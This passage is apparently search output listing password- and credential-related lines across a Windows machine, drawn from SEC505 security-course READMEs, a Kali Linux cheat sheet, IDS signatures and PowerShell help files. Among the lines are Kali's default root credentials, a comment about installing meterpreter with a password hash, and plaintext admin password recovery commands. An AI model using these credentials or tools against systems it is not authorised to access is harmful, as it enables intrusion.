folder. This is possible because the script and public key would be accessible to the \nattacker too. Realistically, though, a DoS attack in which millions of new archive files are created would likely be of low value for the \nattacker since it would be easy to detect, easy to log the name or IP of the machine creating the new files, easy to use timestamps in the \nshare to identify post-attack files, easy to recover from nightly or weekly backups, and the DoS attack would not allow the hacker to expand \ntheir existing powers to new machines. Besides, the benefit to us of managing local administrative account passwords correctly far exceeds \nthe potential negative of this sort of DoS attack. \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:136:The output of the Recover-PasswordArchive.ps1 \nscript can be piped into other scripts to automate other tasks which require the plaintext password, such as executing commands, doing WMI \nqueries, opening an RDP session, or immediately resetting the password again when finished.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:138:When recovering a password, you can pipe the \npassword into the built-in clip.exe utility to put the password into the clipboard, like this:\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:140: \n\\\\controller\\password-archives\\Recover-PasswordArchive.ps1 `\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:141: -PasswordArchivePath \n\\\\controller\\password-archives -ComputerName laptop47 ` \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:142: -UserName Administrator | select-object \n-expandproperty password | clip.exe\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:144:Keep the number of files in the archive folder \nmanageable by using the CleanUp-PasswordArchives.ps1 script. Perhaps running this script as a scheduled job every two or four weeks.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:146:To optimize the performance of the \nRecover-PasswordArchive.ps1 script when there are more than 100,000 files in the folder containing the password archives, disable 8.3 file \nname generation and strip all current 8.3 names on the volume containing that folder. Search the Internet on \"fsutil.exe 8dot3name\" to see \nhow. \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:150:You can also perform an immediate password update \nwith commands wrapped in a function like the following:\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:153: Invoke-Command -ComputerName laptop47 -filepath \n.\\Update-PasswordArchive.ps1 -argumentlist \"C:\\publickeycert.cer\",\"Administrator\",\"c:\\\"\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:158:The above Invoke-Command can be done by specifying \nUNC paths instead, but this requires delegation of credentials to the remote computer, which is not ideal for limiting token abuse attacks, \nso the certificate and archive files should be copied back-and-forth manually. Besides, wrapped in a function, all these steps would be \nhidden from us anyway.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Event_Log_ID_Numbers.txt:23:529 = Logon Failure: Unknown user name or bad password\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Event_Log_ID_Numbers.txt:29:535 = The specified account's password has expired\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Event_Log_ID_Numbers.txt:72:627 = Change Password Attempt\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Event_Log_ID_Numbers.txt:73:628 = User Account password set\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:6:Default username is \"root\", password is \"toor\".\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:63: Password, User and Group Management\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:65:passwd \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:67:id []\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:69:adduser \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:70:deluser \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:139:smbclient -U -W //server/share\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:140:smbclient -U -W //server/share \n\"\"\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:245:# To install meterpreter with a username and \npassword/hash:\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kerberos\\License.txt:14:MEMBER ACCOUNT, PASSWORD, AND SECURITY\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kerberos\\License.txt:56:MEMBER ACCOUNT, PASSWORD, AND SECURITY\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kerberos\\License.txt:57:If any of the Services requires you to open an account, \nyou must complete the registration process by providing us with current, complete and accurate information as prompted by the applicable \nregistration form. You are entirely responsible for maintaining the confidentiality of your password and account. Furthermore, you are \nentirely responsible for any and all activities that occur under your account. You agree to notify Microsoft immediately of any unauthorized \nuse of your account or any other breach of security. Microsoft will not be liable for any loss that you may incur as a result of someone \nelse using your password or account, either with or without your knowledge. However, you could be held liable for losses incurred by \nMicrosoft or another party due to someone else using your account or password. You may not use anyone else's account without the permission \nof the account holder. \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kerberos\\License.txt:61:As a condition of your use of Services, you will not use \nthem for any purpose that is unlawful or prohibited by these terms, conditions, and notices. You may not use the Services in any manner that \ncould damage, disable, overburden, or impair any Microsoft server, or the network(s) connected to any Microsoft server, or interfere with \nany other party’s use and enjoyment of any Services. You may not attempt to gain unauthorized access to any Services, other accounts, \ncomputer systems or networks connected to any Microsoft server or to any of the Services, through hacking, password mining or any other \nmeans. You may not obtain or attempt to obtain any materials or information through any means not intentionally made available through the \nServices. \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day6-Servers\\Kerberos\\README.txt:1:This folder contains a PowerShell script to reset the \npassword of\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Extras\\VBScript\\passwords.txt:1:password\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Extras\\VBScript\\signatures.txt:17:iisadmpwd attempts to access the IIS 4.0 \nchange password scripts (reconnaissance).\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Extras\\VBScript\\signatures.txt:47:/\\~.+|\\%2f\\%7e attempts to use a /~ in a \nrequest (possible username search).\nC:\\Users\\Administrator\\Desktop\\SysinternalsSuite\\Eula.txt:28:Please be aware that, similar to other debug tools that capture “process state” \ninformation, files saved by Sysinternals tools may include personally identifiable or other sensitive information (such as usernames, \npasswords, paths to files accessed, and paths to registry accessed). By using this software, you acknowledge that you are aware of this and \ntake sole responsibility for any personally identifiable or other sensitive information provided to Microsoft or any other party through \nyour use of the software.\nC:\\Users\\Administrator\\Desktop\\SysinternalsSuite\\readme.txt:18:Autologon - Bypass password screen during logon.\nC:\\Users\\Administrator\\Desktop\\SysinternalsSuite\\readme.txt:102:PsPasswd - Changes account passwords.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Automatic_Variables.help.txt:109: typically C:\\Users\\.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:181: parameter set, a UserName \nparameter in the User parameter set, and a \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:194: $UserName,\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:220: $UserName,\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:561: $UserName\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_OutputTypeAttribute.help.txt:133: $UserName\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Jobs.help.txt:287: The following command starts a job without the required \ncredentials. It\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Jobs.help.txt:305: credentials to run the command. The value of the Reason \nproperty is:\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Language_Modes.help.txt:172: PSCredential\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Pipelines.help.txt:367: Parameter [Credential] PIPELINE INPUT \nValueFromPipelineByPropertyName NO COERCION\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Preference_Variables.help.txt:1084: ProxyCredential :\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_PSSession_Details.help.txt:106: the current user must be able to supply the \ncredentials of a member of \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_PSSession_Details.help.txt:142: only if you can supply the credentials of the user \nwho created the\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_PSSession_Details.help.txt:144: includes RunAs credentials. Otherwise, you can \nget, connect to, use,\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Disconnected_Sessions.help.txt:94: but only if they can supply the \ncredentials that were used \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Disconnected_Sessions.help.txt:95: to create the session, or use the RunAs \ncredentials of\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:63: name and password credentials on the local computer or the \ncredentials\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:65: The credentials and the rest of the transmission are \nencrypted. \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:513: to use the Credential parameter of the Invoke-Command, \nNew-PSSession,\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:514: or Enter-PSSession cmdlets to provide the credentials of \na member of the \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:521: credentials.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Requirements.help.txt:62: provide the credentials of an administrator. \nOtherwise, the command fails.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:273: HOW TO PROVIDE ADMINISTRATOR CREDENTIALS \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:279: computer. Credentials are sometimes required \neven when the current user is\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:283: computer, or can provide the credentials of a \nmember of the Administrators\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:284: group, use the Credential parameter of the \nNew-PSSession, Enter-PSSession\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:287: For example, the following command provides \nthe credentials of an\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:290: Invoke-Command -ComputerName Server01 \n-Credential Domain01\\Admin01\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:292: For more information about the Credential \nparameter, see New-PSSession,\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:374: 2. Use the Credential parameter in all remote \ncommands.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:376: This is required even when you are \nsubmitting the credentials\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:400: 2. Verify that a password is set on the \nworkgroup-based computer. If a\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:401: password is not set or the password value \nis empty, you cannot run\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:404: To set password for your user account, use \nUser Accounts in Control\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:408: 3. Use the Credential parameter in all remote \ncommands.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:410: This is required even when you are \nsubmitting the credentials\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:544: -- ProxyCredential\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:548: 1. Use the ProxyAccessType, \nProxyAuthentication, and ProxyCredential\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:562: -ProxyAuthentication Negotiate \n-ProxyCredential Domain01\\User01\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:44: function ScreenPassword($instance)\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:50: foreach ($a in @(get-wmiobject win32_desktop)) { \nScreenPassword($a) }\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:53: This script checks each user account. The ScreenPassword \nfunction returns \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:54: the name of any user account that does not have a \npassword-protected \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:55: screen saver. If the screen saver is password protected, the \nfunction \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:529: $Cred = Get-Credential\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:530: Invoke-Command $s {Remove-Item .\\Test*.ps1 -Credential \n$Using:Cred} \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:537: $Cred = Get-Credential\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:538: Invoke-Command $s {param($c) Remove-Item .\\Test*.ps1 \n-Credential $c} -ArgumentList $Cred \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Script_Internationalization.help.txt:157:if (!($username)) { $msgTable.promptMsg } \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Session_Configurations.help.txt:304: the WithProfile session configuration or \ncan supply the credentials of a\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Session_Configuration_Files.help.txt:230: RunAsPassword \nNoteProperty System.String RunAsPassword=\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:173: The MakeCert.exe tool will prompt you for a private key \npassword. The \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:174: password ensures that no one can use or access the \ncertificate without\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:175: your consent. Create and enter a password that you can \nremember. You will \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:176: use this password later to retrieve the certificate.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:277: 6. Type a password, and then type it again to confirm.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:293: 4. On the Password page, select \"Enable strong private \nkey protection\",\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:294: and then enter the password that you assigned during \nthe export \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:156: The Update-Help and Save-Help cmdlets have a \nUseDefaultCredentials\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:157: parameter that provides the explicit credentials of \nthe current\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:161: The Update-Help and Save-Help cmdlets also have a \nCredential\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:164: Credential parameter is valid only when you use the \nSourcePath\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory.help.txt:32: Account and Password Policy \nManagement are supported by cmdlets such as\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory.help.txt:34: Set-ADAccountControl, and \nRemove-ADFineGrainedPasswordPolicy.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_Filter.help.txt:133: Get entries with a \nbad password count greater than five:\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_Identity.help.txt:105: \nADFineGrainedPasswordPolicy\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_Identity.help.txt:151: SAM User Name \n(sAMUserName)\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:34: \nADFineGrainedPasswordPolicy\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:45: \nADDefaultDomainPasswordPolicy\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:192: \nADFineGrainedPasswordPolicy\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:193: Represents a \nfine grained password policy object; that is, an AD\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:194: object of type \nmsDS-PasswordSettings in AD DS and is derived from\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:197: An \nADFineGrainedPasswordPolicy may contain the following properties in\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:204: the directory \nattribute: msDS-PasswordComplexityEnabled\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:215: MaxPasswordAge \n- A property of type System.TimeSpan, derived from the\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:216: directory \nattribute: msDS-MaximumPasswordAge\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:218: MinPasswordAge \n- A property of type System.TimeSpan, derived from the\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:219: directory \nattribute: msDS-MinimumPasswordAge\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:221: \nMinPasswordLength - A property of type System.Int32, derived from the\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:222: directory \nattribute: msDS-MinimumPasswordLength\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:224: \nPasswordHistoryCount - A property of type System.Int32, derived from\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:225: the directory \nattribute: msDS-PasswordHistoryLength\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:228: directory \nattribute: msDS-PasswordSettingsPrecedence\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:232: \nmsDS-PasswordReversibleEncryptionEnabled\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:433: \nAllowReversiblePasswordEncryption - A property of type System.Boolean,\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:436: attribute: \nms-DS-UserEncryptedTextPasswordAllowed\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:441: \nCannotChangePassword - A property of type System.Boolean, derived from\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:463: \nLastBadPasswordAttempt - A property of type System.DateTime, derived\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:464: from the \ndirectory attribute: badPasswordTime\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:479: \nPasswordExpired - A property of type System.Boolean, for AD DS it is\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:482: directory \nattribute msDS-UserPasswordExpired\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:484: \nPasswordLastSet - A property of type System.DateTime, derived from the\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:487: \nPasswordNeverExpires - A property of type System.Boolean, for AD LDS\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:490: directory \nattribute: msDS-UserDontExpirePassword\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:492: \nPasswordNotRequired - A property of type System.Boolean, for AD DS it\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:495: directory \nattribute: ms-DS-UserPasswordNotRequired\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:698: \nADDefaultDomainPasswordPolicy\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:699: Represents the \ndomain-wide password policy of an Active Directory\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:703: An \nADDefaultDomainPasswordPolicy may contain the following properties\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:721: MaxPasswordAge \n- A property of type System.TimeSpan, derived from the\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:724: MinPasswordAge \n- A property of type System.TimeSpan, derived from the\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:727: \nMinPasswordLength - A property of type System.Int32, derived from the\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_ObjectModel.help.txt:730: \nPasswordHistoryCount - A property of type System.Int32, derived from\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\en-US\\about_Scheduled_Jobs_Troubleshooting.help.txt:94: \nC:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ScheduledJob\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\en-US\\about_Scheduled_Jobs_Troubleshooting.help.txt:394: job or the \npermissions of the user who is specified by the Credential\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\en-US\\about_Scheduled_Jobs_Troubleshooting.help.txt:425: \nC:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\PowerShell\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters.help.txt:55: PSCredential\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters.help.txt:216: user's credentials \nwhen connecting to the target computers. \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters.help.txt:218: Negotiate, and \nNegotiateWithImplicitCredential. The default \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters.help.txt:227: CAUTION: Credential \nSecurity Service Provider (CredSSP) \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters.help.txt:228: authentication, in \nwhich the user's credentials are passed \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters.help.txt:233: If the remote \ncomputer is compromised, the credentials that \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters.help.txt:273: parameter, the \ncommand must include the PSCredential \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters.help.txt:336: -PSCredential \n\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters.help.txt:345: or enter a variable \nthat contains a PSCredential object, \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters.help.txt:346: such as one that the \nGet-Credential cmdlet returns. If \nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters.help.txt:348: password.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters.help.txt:21: PSComputerName and \nPSCredential. The PS-prefixed parameters configure\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters.help.txt:93: Specifies the \nmechanism that is used to authenticate the user's credentials\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters.help.txt:95: Credssp, Digest, \nKerberos, Negotiate, and NegotiateWithImplicitCredential.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters.help.txt:102: CAUTION: Credential \nSecurity Service Provider (CredSSP) authentication, in\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters.help.txt:103: which the user's \ncredentials are passed to a remote computer to be\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters.help.txt:107: is compromised, the \ncredentials that are passed to it can be used to control\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters.help.txt:160: command must include \nthe PSCredential parameter. Also, the computer must be\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters.help.txt:209: -PSCredential \n\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters.help.txt:215: variable that \ncontains a PSCredential object, such as one that the\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters.help.txt:216: Get-Credential \ncmdlet returns. If you enter only a user name, you will be\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters.help.txt:217: prompted for a 